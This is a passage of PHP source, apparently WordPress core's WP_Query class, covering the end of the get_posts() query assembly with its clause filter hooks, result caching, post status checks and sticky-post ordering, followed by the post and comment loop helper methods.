$cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID ) $join ";
$cwhere = "WHERE comment_approved = '1' $where";
$cgroupby = "{$wpdb->comments}.comment_id";
} else { // Other non-singular, e.g. front.
$cjoin = "JOIN {$wpdb->posts} ON ( {$wpdb->comments}.comment_post_ID = {$wpdb->posts}.ID )";
$cwhere = "WHERE ( post_status = 'publish' OR ( post_status = 'inherit' AND post_type = 'attachment' ) ) AND comment_approved = '1'";
$cgroupby = '';
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the JOIN clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cjoin The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cjoin = apply_filters_ref_array( 'comment_feed_join', array( $cjoin, &$this ) );
/**
* Filters the WHERE clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cwhere The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cwhere = apply_filters_ref_array( 'comment_feed_where', array( $cwhere, &$this ) );
/**
* Filters the GROUP BY clause of the comments feed query before sending.
*
* @since 2.2.0
*
* @param string $cgroupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( $cgroupby, &$this ) );
/**
* Filters the ORDER BY clause of the comments feed query before sending.
*
* @since 2.8.0
*
* @param string $corderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) );
/**
* Filters the LIMIT clause of the comments feed query before sending.
*
* @since 2.8.0
*
* @param string $climits The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) );
}
$cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : '';
$corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : '';
$climits = ( ! empty( $climits ) ) ? $climits : '';
$comments_request = "SELECT $distinct {$wpdb->comments}.comment_ID FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits";
$key = md5( $comments_request );
$last_changed = array(
wp_cache_get_last_changed( 'comment' ),
wp_cache_get_last_changed( 'posts' ),
);
$cache_key = "comment_feed:$key";
$comment_ids = wp_cache_get_salted( $cache_key, 'comment-queries', $last_changed );
if ( false === $comment_ids ) {
$comment_ids = $wpdb->get_col( $comments_request );
wp_cache_set_salted( $cache_key, $comment_ids, 'comment-queries', $last_changed );
}
_prime_comment_caches( $comment_ids );
// Convert to WP_Comment.
/** @var WP_Comment[] */
$this->comments = array_map( 'get_comment', $comment_ids );
$this->comment_count = count( $this->comments );
$post_ids = array();
foreach ( $this->comments as $comment ) {
$post_ids[] = (int) $comment->comment_post_ID;
}
$post_ids = implode( ',', $post_ids );
$join = '';
if ( $post_ids ) {
$where = "AND {$wpdb->posts}.ID IN ($post_ids) ";
} else {
$where = 'AND 0';
}
}
$pieces = array( 'where', 'groupby', 'join', 'orderby', 'distinct', 'fields', 'limits' );
/*
* Apply post-paging filters on where and join. Only plugins that
* manipulate paging queries should use these hooks.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* Specifically for manipulating paging queries.
*
* @since 1.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where_paged', array( $where, &$this ) );
/**
* Filters the GROUP BY clause of the query.
*
* @since 2.0.0
*
* @param string $groupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$groupby = apply_filters_ref_array( 'posts_groupby', array( $groupby, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* Specifically for manipulating paging queries.
*
* @since 1.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join_paged', array( $join, &$this ) );
/**
* Filters the ORDER BY clause of the query.
*
* @since 1.5.1
*
* @param string $orderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$orderby = apply_filters_ref_array( 'posts_orderby', array( $orderby, &$this ) );
/**
* Filters the DISTINCT clause of the query.
*
* @since 2.1.0
*
* @param string $distinct The DISTINCT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$distinct = apply_filters_ref_array( 'posts_distinct', array( $distinct, &$this ) );
/**
* Filters the LIMIT clause of the query.
*
* @since 2.1.0
*
* @param string $limits The LIMIT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$limits = apply_filters_ref_array( 'post_limits', array( $limits, &$this ) );
/**
* Filters the SELECT clause of the query.
*
* @since 2.1.0
*
* @param string $fields The SELECT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$fields = apply_filters_ref_array( 'posts_fields', array( $fields, &$this ) );
/**
* Filters all query clauses at once, for convenience.
*
* Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT,
* fields (SELECT), and LIMIT clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$clauses = (array) apply_filters_ref_array( 'posts_clauses', array( compact( $pieces ), &$this ) );
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : '';
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
}
/**
* Fires to announce the query's current selection parameters.
*
* For use by caching plugins.
*
* @since 2.3.0
*
* @param string $selection The assembled selection query.
*/
do_action( 'posts_selection', $where . $groupby . $orderby . $limits . $join );
/*
* Filters again for the benefit of caching plugins.
* Regular plugins should use the hooks above.
*/
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the WHERE clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $where The WHERE clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$where = apply_filters_ref_array( 'posts_where_request', array( $where, &$this ) );
/**
* Filters the GROUP BY clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $groupby The GROUP BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$groupby = apply_filters_ref_array( 'posts_groupby_request', array( $groupby, &$this ) );
/**
* Filters the JOIN clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $join The JOIN clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$join = apply_filters_ref_array( 'posts_join_request', array( $join, &$this ) );
/**
* Filters the ORDER BY clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $orderby The ORDER BY clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$orderby = apply_filters_ref_array( 'posts_orderby_request', array( $orderby, &$this ) );
/**
* Filters the DISTINCT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $distinct The DISTINCT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$distinct = apply_filters_ref_array( 'posts_distinct_request', array( $distinct, &$this ) );
/**
* Filters the SELECT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $fields The SELECT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$fields = apply_filters_ref_array( 'posts_fields_request', array( $fields, &$this ) );
/**
* Filters the LIMIT clause of the query.
*
* For use by caching plugins.
*
* @since 2.5.0
*
* @param string $limits The LIMIT clause of the query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$limits = apply_filters_ref_array( 'post_limits_request', array( $limits, &$this ) );
/**
* Filters all query clauses at once, for convenience.
*
* For use by caching plugins.
*
* Covers the WHERE, GROUP BY, JOIN, ORDER BY, DISTINCT,
* fields (SELECT), and LIMIT clauses.
*
* @since 3.1.0
*
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$clauses = (array) apply_filters_ref_array( 'posts_clauses_request', array( compact( $pieces ), &$this ) );
$where = isset( $clauses['where'] ) ? $clauses['where'] : '';
$groupby = isset( $clauses['groupby'] ) ? $clauses['groupby'] : '';
$join = isset( $clauses['join'] ) ? $clauses['join'] : '';
$orderby = isset( $clauses['orderby'] ) ? $clauses['orderby'] : '';
$distinct = isset( $clauses['distinct'] ) ? $clauses['distinct'] : '';
$fields = isset( $clauses['fields'] ) ? $clauses['fields'] : '';
$limits = isset( $clauses['limits'] ) ? $clauses['limits'] : '';
}
if ( ! empty( $groupby ) ) {
$groupby = 'GROUP BY ' . $groupby;
}
if ( ! empty( $orderby ) ) {
$orderby = 'ORDER BY ' . $orderby;
}
$found_rows = '';
if ( ! $query_vars['no_found_rows'] && ! empty( $limits ) ) {
$found_rows = 'SQL_CALC_FOUND_ROWS';
}
/*
* Beginning of the string is on a new line to prevent leading whitespace.
*
* The additional indentation of subsequent lines is to ensure the SQL
* queries are identical to those generated when splitting queries. This
* improves caching of the query by ensuring the same cache key is
* generated for the same database queries functionally.
*
* See https://core.trac.wordpress.org/ticket/56841.
* See https://github.com/WordPress/wordpress-develop/pull/6393#issuecomment-2088217429
*/
$old_request =
"SELECT $found_rows $distinct $fields
FROM {$wpdb->posts} $join
WHERE 1=1 $where
$groupby
$orderby
$limits";
$this->request = $old_request;
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the completed SQL query before sending.
*
* @since 2.0.0
*
* @param string $request The complete SQL query.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->request = apply_filters_ref_array( 'posts_request', array( $this->request, &$this ) );
}
/**
* Filters the posts array before the query takes place.
*
* Return a non-null value to bypass WordPress' default post queries.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_posts` and `max_num_pages` properties of the WP_Query object,
* passed to the filter by reference. If WP_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 4.6.0
*
* @param WP_Post[]|int[]|null $posts Return an array of post data to short-circuit WP's query,
* or null to allow WP to run its normal queries.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'posts_pre_query', array( null, &$this ) );
/*
* Ensure the ID database query is able to be cached.
*
* Random queries are expected to have unpredictable results and
* cannot be cached. Note the space before `RAND` in the string
* search, that to ensure against a collision with another
* function.
*
* If `$fields` has been modified by the `posts_fields`,
* `posts_fields_request`, `post_clauses` or `posts_clauses_request`
* filters, then caching is disabled to prevent caching collisions.
*/
$id_query_is_cacheable = ! str_contains( strtoupper( $orderby ), ' RAND(' );
$cacheable_field_values = array(
"{$wpdb->posts}.*",
"{$wpdb->posts}.ID, {$wpdb->posts}.post_parent",
"{$wpdb->posts}.ID",
);
if ( ! in_array( $fields, $cacheable_field_values, true ) ) {
$id_query_is_cacheable = false;
}
$last_changed = (array) wp_cache_get_last_changed( 'posts' );
if ( ! empty( $this->tax_query->queries ) ) {
$last_changed[] = wp_cache_get_last_changed( 'terms' );
}
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$new_request = str_replace( $fields, "{$wpdb->posts}.*", $this->request );
$cache_key = $this->generate_cache_key( $query_vars, $new_request );
$cache_found = false;
if ( null === $this->posts ) {
$cached_results = wp_cache_get_salted( $cache_key, 'post-queries', $last_changed );
if ( $cached_results ) {
$cache_found = true;
/** @var int[] */
$post_ids = array_map( 'intval', $cached_results['posts'] );
$this->post_count = count( $post_ids );
$this->found_posts = $cached_results['found_posts'];
$this->max_num_pages = $cached_results['max_num_pages'];
if ( 'ids' === $query_vars['fields'] ) {
$this->posts = $post_ids;
return $this->posts;
} elseif ( 'id=>parent' === $query_vars['fields'] ) {
_prime_post_parent_id_caches( $post_ids );
$post_parent_cache_keys = array();
foreach ( $post_ids as $post_id ) {
$post_parent_cache_keys[] = 'post_parent:' . (string) $post_id;
}
/** @var int[] */
$post_parents = wp_cache_get_multiple( $post_parent_cache_keys, 'posts' );
foreach ( $post_parents as $cache_key => $post_parent ) {
$obj = new stdClass();
$obj->ID = (int) str_replace( 'post_parent:', '', $cache_key );
$obj->post_parent = (int) $post_parent;
$this->posts[] = $obj;
}
return $post_parents;
} else {
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $post_ids );
}
}
}
}
if ( 'ids' === $query_vars['fields'] ) {
if ( null === $this->posts ) {
$this->posts = $wpdb->get_col( $this->request );
}
/** @var int[] */
$this->posts = array_map( 'intval', $this->posts );
$this->post_count = count( $this->posts );
$this->set_found_posts( $query_vars, $limits );
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$cache_value = array(
'posts' => $this->posts,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
return $this->posts;
}
if ( 'id=>parent' === $query_vars['fields'] ) {
if ( null === $this->posts ) {
$this->posts = $wpdb->get_results( $this->request );
}
$this->post_count = count( $this->posts );
$this->set_found_posts( $query_vars, $limits );
/** @var int[] */
$post_parents = array();
$post_ids = array();
$post_parents_cache = array();
foreach ( $this->posts as $key => $post ) {
$this->posts[ $key ]->ID = (int) $post->ID;
$this->posts[ $key ]->post_parent = (int) $post->post_parent;
$post_parents[ (int) $post->ID ] = (int) $post->post_parent;
$post_ids[] = (int) $post->ID;
$post_parents_cache[ 'post_parent:' . (string) $post->ID ] = (int) $post->post_parent;
}
// Prime post parent caches, so that on second run, there is not another database query.
wp_cache_add_multiple( $post_parents_cache, 'posts' );
if ( $query_vars['cache_results'] && $id_query_is_cacheable ) {
$cache_value = array(
'posts' => $post_ids,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
return $post_parents;
}
$is_unfiltered_query = $old_request === $this->request && "{$wpdb->posts}.*" === $fields;
if ( null === $this->posts ) {
$split_the_query = (
$is_unfiltered_query
&& (
wp_using_ext_object_cache()
|| ( ! empty( $limits ) && $query_vars['posts_per_page'] < 500 )
)
);
/**
* Filters whether to split the query.
*
* Splitting the query will cause it to fetch just the IDs of the found posts
* (and then individually fetch each post by ID), rather than fetching every
* complete row at once. One massive result vs. many small results.
*
* @since 3.4.0
* @since 6.6.0 Added the `$old_request` and `$clauses` parameters.
*
* @param bool $split_the_query Whether or not to split the query.
* @param WP_Query $query The WP_Query instance.
* @param string $old_request The complete SQL query before filtering.
* @param string[] $clauses {
* Associative array of the clauses for the query.
*
* @type string $where The WHERE clause of the query.
* @type string $groupby The GROUP BY clause of the query.
* @type string $join The JOIN clause of the query.
* @type string $orderby The ORDER BY clause of the query.
* @type string $distinct The DISTINCT clause of the query.
* @type string $fields The SELECT clause of the query.
* @type string $limits The LIMIT clause of the query.
* }
*/
$split_the_query = apply_filters( 'split_the_query', $split_the_query, $this, $old_request, compact( $pieces ) );
if ( $split_the_query ) {
// First get the IDs and then fill in the objects.
// Beginning of the string is on a new line to prevent leading whitespace. See https://core.trac.wordpress.org/ticket/56841.
$this->request =
"SELECT $found_rows $distinct {$wpdb->posts}.ID
FROM {$wpdb->posts} $join
WHERE 1=1 $where
$groupby
$orderby
$limits";
/**
* Filters the Post IDs SQL request before sending.
*
* @since 3.4.0
*
* @param string $request The post ID request.
* @param WP_Query $query The WP_Query instance.
*/
$this->request = apply_filters( 'posts_request_ids', $this->request, $this );
$post_ids = $wpdb->get_col( $this->request );
if ( $post_ids ) {
$this->posts = $post_ids;
$this->set_found_posts( $query_vars, $limits );
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
} else {
$this->posts = array();
}
} else {
$this->posts = $wpdb->get_results( $this->request );
$this->set_found_posts( $query_vars, $limits );
}
}
// Convert to WP_Post objects.
if ( $this->posts ) {
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $this->posts );
}
$unfiltered_posts = $this->posts;
if ( $query_vars['cache_results'] && $id_query_is_cacheable && ! $cache_found ) {
$post_ids = wp_list_pluck( $this->posts, 'ID' );
$cache_value = array(
'posts' => $post_ids,
'found_posts' => $this->found_posts,
'max_num_pages' => $this->max_num_pages,
);
wp_cache_set_salted( $cache_key, $cache_value, 'post-queries', $last_changed );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the raw post results array, prior to status checks.
*
* @since 2.3.0
*
* @param WP_Post[] $posts Array of post objects.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'posts_results', array( $this->posts, &$this ) );
}
if ( ! empty( $this->posts ) && $this->is_comment_feed && $this->is_singular ) {
/** This filter is documented in wp-includes/query.php */
$cjoin = apply_filters_ref_array( 'comment_feed_join', array( '', &$this ) );
/** This filter is documented in wp-includes/query.php */
$cwhere = apply_filters_ref_array( 'comment_feed_where', array( "WHERE comment_post_ID = '{$this->posts[0]->ID}' AND comment_approved = '1'", &$this ) );
/** This filter is documented in wp-includes/query.php */
$cgroupby = apply_filters_ref_array( 'comment_feed_groupby', array( '', &$this ) );
$cgroupby = ( ! empty( $cgroupby ) ) ? 'GROUP BY ' . $cgroupby : '';
/** This filter is documented in wp-includes/query.php */
$corderby = apply_filters_ref_array( 'comment_feed_orderby', array( 'comment_date_gmt DESC', &$this ) );
$corderby = ( ! empty( $corderby ) ) ? 'ORDER BY ' . $corderby : '';
/** This filter is documented in wp-includes/query.php */
$climits = apply_filters_ref_array( 'comment_feed_limits', array( 'LIMIT ' . get_option( 'posts_per_rss' ), &$this ) );
$comments_request = "SELECT {$wpdb->comments}.comment_ID FROM {$wpdb->comments} $cjoin $cwhere $cgroupby $corderby $climits";
$comment_key = md5( $comments_request );
$comment_last_changed = wp_cache_get_last_changed( 'comment' );
$comment_cache_key = "comment_feed:$comment_key";
$comment_ids = wp_cache_get_salted( $comment_cache_key, 'comment-queries', $comment_last_changed );
if ( false === $comment_ids ) {
$comment_ids = $wpdb->get_col( $comments_request );
wp_cache_set_salted( $comment_cache_key, $comment_ids, 'comment-queries', $comment_last_changed );
}
_prime_comment_caches( $comment_ids );
// Convert to WP_Comment.
/** @var WP_Comment[] */
$this->comments = array_map( 'get_comment', $comment_ids );
$this->comment_count = count( $this->comments );
}
// Check post status to determine if post should be displayed.
if ( ! empty( $this->posts ) && ( $this->is_single || $this->is_page ) ) {
$status = get_post_status( $this->posts[0] );
if ( 'attachment' === $this->posts[0]->post_type && 0 === (int) $this->posts[0]->post_parent ) {
$this->is_page = false;
$this->is_single = true;
$this->is_attachment = true;
}
// If the post_status was specifically requested, let it pass through.
if ( ! in_array( $status, $q_status, true ) ) {
$post_status_obj = get_post_status_object( $status );
if ( $post_status_obj && ! $post_status_obj->public ) {
if ( ! is_user_logged_in() ) {
// User must be logged in to view unpublished posts.
$this->posts = array();
} else {
if ( $post_status_obj->protected ) {
// User must have edit permissions on the draft to preview.
if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
} else {
$this->is_preview = true;
if ( 'future' !== $status ) {
$this->posts[0]->post_date = current_time( 'mysql' );
}
}
} elseif ( $post_status_obj->private ) {
if ( ! current_user_can( $read_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
}
} else {
$this->posts = array();
}
}
} elseif ( ! $post_status_obj ) {
// Post status is not registered, assume it's not public.
if ( ! current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
$this->posts = array();
}
}
}
if ( $this->is_preview && $this->posts && current_user_can( $edit_cap, $this->posts[0]->ID ) ) {
/**
* Filters the single post for preview mode.
*
* @since 2.7.0
*
* @param WP_Post $post_preview The Post object.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts[0] = get_post( apply_filters_ref_array( 'the_preview', array( $this->posts[0], &$this ) ) );
}
}
// Put sticky posts at the top of the posts array.
$sticky_posts = get_option( 'sticky_posts' );
if ( $this->is_home && $page <= 1 && is_array( $sticky_posts ) && ! empty( $sticky_posts ) && ! $query_vars['ignore_sticky_posts'] ) {
$num_posts = count( $this->posts );
$sticky_offset = 0;
// Loop over posts and relocate stickies to the front.
for ( $i = 0; $i < $num_posts; $i++ ) {
if ( in_array( $this->posts[ $i ]->ID, $sticky_posts, true ) ) {
$sticky_post = $this->posts[ $i ];
// Remove sticky from current position.
array_splice( $this->posts, $i, 1 );
// Move to front, after other stickies.
array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) );
// Increment the sticky offset. The next sticky will be placed at this offset.
++$sticky_offset;
// Remove post from sticky posts array.
$offset = array_search( $sticky_post->ID, $sticky_posts, true );
unset( $sticky_posts[ $offset ] );
}
}
// If any posts have been excluded specifically, Ignore those that are sticky.
if ( ! empty( $sticky_posts ) && ! empty( $query_vars['post__not_in'] ) ) {
$sticky_posts = array_diff( $sticky_posts, $query_vars['post__not_in'] );
}
// Fetch sticky posts that weren't in the query results.
if ( ! empty( $sticky_posts ) ) {
$stickies = get_posts(
array(
'post__in' => $sticky_posts,
'post_type' => $post_type,
'post_status' => 'publish',
'posts_per_page' => count( $sticky_posts ),
'suppress_filters' => $query_vars['suppress_filters'],
'cache_results' => $query_vars['cache_results'],
'update_post_meta_cache' => $query_vars['update_post_meta_cache'],
'update_post_term_cache' => $query_vars['update_post_term_cache'],
'lazy_load_term_meta' => $query_vars['lazy_load_term_meta'],
)
);
foreach ( $stickies as $sticky_post ) {
array_splice( $this->posts, $sticky_offset, 0, array( $sticky_post ) );
++$sticky_offset;
}
}
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the array of retrieved posts after they've been fetched and
* internally processed.
*
* @since 1.5.0
*
* @param WP_Post[] $posts Array of post objects.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->posts = apply_filters_ref_array( 'the_posts', array( $this->posts, &$this ) );
}
/*
* Ensure that any posts added/modified via one of the filters above are
* of the type WP_Post and are filtered.
*/
if ( $this->posts ) {
$this->post_count = count( $this->posts );
/** @var WP_Post[] */
$this->posts = array_map( 'get_post', $this->posts );
if ( $query_vars['cache_results'] ) {
if ( $is_unfiltered_query && $unfiltered_posts === $this->posts ) {
update_post_caches( $this->posts, $post_type, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
} else {
$post_ids = wp_list_pluck( $this->posts, 'ID' );
_prime_post_caches( $post_ids, $query_vars['update_post_term_cache'], $query_vars['update_post_meta_cache'] );
}
}
/** @var WP_Post */
$this->post = reset( $this->posts );
} else {
$this->post_count = 0;
$this->posts = array();
}
if ( ! empty( $this->posts ) && $query_vars['update_menu_item_cache'] ) {
update_menu_item_cache( $this->posts );
}
if ( $query_vars['lazy_load_term_meta'] ) {
wp_queue_posts_for_term_meta_lazyload( $this->posts );
}
return $this->posts;
}
/**
* Sets up the amount of found posts and the number of pages (if limit clause was used)
* for the current query.
*
* @since 3.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @param string $limits LIMIT clauses of the query.
*/
private function set_found_posts( $query_vars, $limits ) {
global $wpdb;
/*
* Bail if posts is an empty array. Continue if posts is an empty string,
* null, or false to accommodate caching plugins that fill posts later.
*/
if ( $query_vars['no_found_rows'] || ( is_array( $this->posts ) && ! $this->posts ) ) {
return;
}
if ( ! empty( $limits ) ) {
/**
* Filters the query to run for retrieving the found posts.
*
* @since 2.1.0
*
* @param string $found_posts_query The query to run to find the found posts.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$found_posts_query = apply_filters_ref_array( 'found_posts_query', array( 'SELECT FOUND_ROWS()', &$this ) );
$this->found_posts = (int) $wpdb->get_var( $found_posts_query );
} else {
if ( is_array( $this->posts ) ) {
$this->found_posts = count( $this->posts );
} else {
if ( null === $this->posts ) {
$this->found_posts = 0;
} else {
$this->found_posts = 1;
}
}
}
/**
* Filters the number of found posts for the query.
*
* @since 2.1.0
*
* @param int $found_posts The number of posts found.
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
$this->found_posts = (int) apply_filters_ref_array( 'found_posts', array( $this->found_posts, &$this ) );
if ( ! empty( $limits ) ) {
$this->max_num_pages = (int) ceil( $this->found_posts / $query_vars['posts_per_page'] );
}
}
/**
* Sets up the next post and iterate current post index.
*
* @since 1.5.0
*
* @return WP_Post Next post.
*/
public function next_post() {
++$this->current_post;
/** @var WP_Post */
$this->post = $this->posts[ $this->current_post ];
return $this->post;
}
/**
* Sets up the current post.
*
* Retrieves the next post, sets up the post, sets the 'in the loop'
* property to true.
*
* @since 1.5.0
*
* @global WP_Post $post Global post object.
*/
public function the_post() {
global $post;
if ( ! $this->in_the_loop ) {
if ( 'all' === $this->query_vars['fields'] ) {
// Full post objects queried.
$post_objects = $this->posts;
} else {
if ( 'ids' === $this->query_vars['fields'] ) {
// Post IDs queried.
$post_ids = $this->posts;
} else {
// Only partial objects queried, need to prime the cache for the loop.
$post_ids = array_reduce(
$this->posts,
function ( $carry, $post ) {
if ( isset( $post->ID ) ) {
$carry[] = $post->ID;
}
return $carry;
},
array()
);
}
_prime_post_caches( $post_ids, $this->query_vars['update_post_term_cache'], $this->query_vars['update_post_meta_cache'] );
$post_objects = array_map( 'get_post', $post_ids );
}
update_post_author_caches( $post_objects );
}
$this->in_the_loop = true;
$this->before_loop = false;
if ( -1 === $this->current_post ) { // Loop has just started.
/**
* Fires once the loop is started.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'loop_start', array( &$this ) );
}
$post = $this->next_post();
// Ensure a full post object is available.
if ( 'all' !== $this->query_vars['fields'] ) {
if ( 'ids' === $this->query_vars['fields'] ) {
// Post IDs queried.
$post = get_post( $post );
} elseif ( isset( $post->ID ) ) {
/*
* Partial objecct queried.
*
* The post object was queried with a partial set of
* fields, populate the entire object for the loop.
*/
$post = get_post( $post->ID );
}
}
// Set up the global post object for the loop.
$this->setup_postdata( $post );
}
/**
* Determines whether there are more posts available in the loop.
*
* Calls the {@see 'loop_end'} action when the loop is complete.
*
* @since 1.5.0
*
* @return bool True if posts are available, false if end of the loop.
*/
public function have_posts() {
if ( $this->current_post + 1 < $this->post_count ) {
return true;
} elseif ( $this->current_post + 1 === $this->post_count && $this->post_count > 0 ) {
/**
* Fires once the loop has ended.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'loop_end', array( &$this ) );
// Do some cleaning up after the loop.
$this->rewind_posts();
} elseif ( 0 === $this->post_count ) {
$this->before_loop = false;
/**
* Fires if no results are found in a post query.
*
* @since 4.9.0
*
* @param WP_Query $query The WP_Query instance.
*/
do_action( 'loop_no_results', $this );
}
$this->in_the_loop = false;
return false;
}
/**
* Rewinds the posts and resets post index.
*
* @since 1.5.0
*/
public function rewind_posts() {
$this->current_post = -1;
if ( $this->post_count > 0 ) {
$this->post = $this->posts[0];
}
}
/**
* Iterates current comment index and returns WP_Comment object.
*
* @since 2.2.0
*
* @return WP_Comment Comment object.
*/
public function next_comment() {
++$this->current_comment;
/** @var WP_Comment */
$this->comment = $this->comments[ $this->current_comment ];
return $this->comment;
}
/**
* Sets up the current comment.
*
* @since 2.2.0
*
* @global WP_Comment $comment Global comment object.
*/
public function the_comment() {
global $comment;
$comment = $this->next_comment();
if ( 0 === $this->current_comment ) {
/**
* Fires once the comment loop is started.
*
* @since 2.2.0
*/
do_action( 'comment_loop_start' );
}
}
/**
* Determines whether there are more comments available.
*
* Automatically rewinds comments when finished.
*
* @since 2.2.0
*
* @return bool True if comments are available, false if no more comments.
*/
public function have_comments() {
if ( $this->current_comment + 1 < $this->comment_count ) {
return true;
} elseif ( $this->current_comment + 1 === $this->comment_count ) {
$this->rewind_comments();
}
return false;
}
/**
* Rewinds the comments, resets the comment index and comment to first.
*
* @since 2.2.0
*/
public function rewind_comments() {
$this->current_comment = -1;
if ( $this->comment_count > 0 ) {
$this->comment = $this->comments[0];
}
}
/**
* Sets up the WordPress query by parsing query string.
*
* @since 1.5.0
*
* @see WP_Query::parse_query() for all available arguments.
*
* @param string|array $query URL query string or array of query arguments.
* @return WP_Post[]|int[] Array of post objects or post IDs.
*/
public function query( $query ) {
$this->init();
$this->query = wp_parse_args( $query );
$this->query_vars = $this->query;
return $this->get_posts();
}
/**
* Retrieves the currently queried object.
*
* If queried object is not set, then the queried object will be set from
* the category, tag, taxonomy, posts page, single post, page, or author
* query variable. After it is set up, it will be returned.
*
* @since 1.5.0
*
* @return WP_Term|WP_Post_Type|WP_Post|WP_User|null The queried object.
*/
public function get_queried_object() {
if ( isset( $this->queried_object ) ) {
return $this->queried_object;
}
